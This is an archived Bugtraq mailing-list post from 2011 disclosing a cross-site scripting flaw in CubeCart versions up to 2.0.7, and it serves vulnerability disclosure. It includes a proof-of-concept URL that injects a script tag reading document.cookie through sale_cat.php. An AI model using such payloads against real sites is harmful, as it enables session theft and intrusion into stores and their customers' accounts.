[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

XSS in CubeCart <= 2.0.7

To: "bugtraq@xxxxxxxxxxxxxxxxx" <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: XSS in CubeCart <= 2.0.7
From: Michele Spagnuolo <mikispag@xxxxxxxxx>
Date: Sun, 6 Mar 2011 21:41:22 +0100

CubeCart (http://www.cubecart.com) up to version 2.0.7 inclusive are vulnerable 
to a XSS in sale_cat.php.

http://www.example.com/storedirectory/sale_cat.php/";;<script>alert(document.cookie)</script>

Prev by Date: [ MDVSA-2011:041 ] firefox
Next by Date: [SECURITY] [DSA 2183-1] nbd security update
Previous by thread: [ MDVSA-2011:041 ] firefox
Next by thread: [SECURITY] [DSA 2183-1] nbd security update
Index(es):
- Date
- Thread